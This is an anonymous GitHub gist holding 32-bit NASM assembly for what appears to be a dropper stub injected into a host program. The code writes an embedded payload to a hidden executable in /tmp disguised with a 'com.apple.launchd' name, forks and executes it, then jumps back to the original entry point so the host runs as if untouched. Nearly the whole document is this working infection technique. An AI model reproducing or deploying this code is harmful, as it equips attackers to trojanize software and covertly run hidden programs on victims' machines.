-
-
Save anonymous/faca9068f29ce205b02a to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| BITS 32 | |
| global start | |
| %define SYS_exit 1 | |
| %define SYS_fork 2 | |
| %define SYS_read 3 | |
| %define SYS_write 4 | |
| %define SYS_open 5 | |
| %define SYS_close 6 | |
| %define SYS_wait4 7 | |
| %define SYS_execve 59 | |
| %macro syscall 1-7 | |
| %if %0 > 6 | |
| push %7 | |
| %endif | |
| %if %0 > 5 | |
| push %6 | |
| %endif | |
| %if %0 > 4 | |
| push %5 | |
| %endif | |
| %if %0 > 3 | |
| push %4 | |
| %endif | |
| %if %0 > 2 | |
| push %3 | |
| %endif | |
| %if %0 > 1 | |
| push %2 | |
| %endif | |
| mov eax, SYS_%1 | |
| sub esp,4 | |
| int 0x80 | |
| add esp,%0*4 | |
| %endmacro | |
| section .text | |
| start: | |
| pushad | |
| call .delta | |
| .delta: | |
| pop ebp | |
| sub ebp,.delta | |
| lea eax,[ebp+file] | |
| syscall open,eax,0x201,0x1c0 | |
| mov ebx,eax | |
| lea ecx,[ebp+payload] | |
| syscall write,ebx,ecx,dword[ebp+config.size] | |
| syscall close,ebx | |
| syscall fork,0,0 | |
| cmp edx,0 | |
| je .next | |
| lea eax,[ebp+file] | |
| lea ebx,[ebp+args] | |
| mov [ebx],eax | |
| syscall execve,eax,ebx,0 | |
| syscall exit,0 | |
| .next: | |
| mov eax,[ebp+config.oep] | |
| lea ecx,[ebp+start] | |
| sub ecx,eax | |
| mov [esp-4],ecx | |
| popad | |
| jmp dword[esp-9*4] | |
| file db "/tmp/com.apple.launchd.A0Pp3PTzd0",0 | |
| args: | |
| dd 0 | |
| dd 0 | |
| config: | |
| .oep dd 0x12345678 | |
| .size dd code_len | |
| payload: | |
| ;incbin "ps" | |
| code_len equ $-(payload) | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment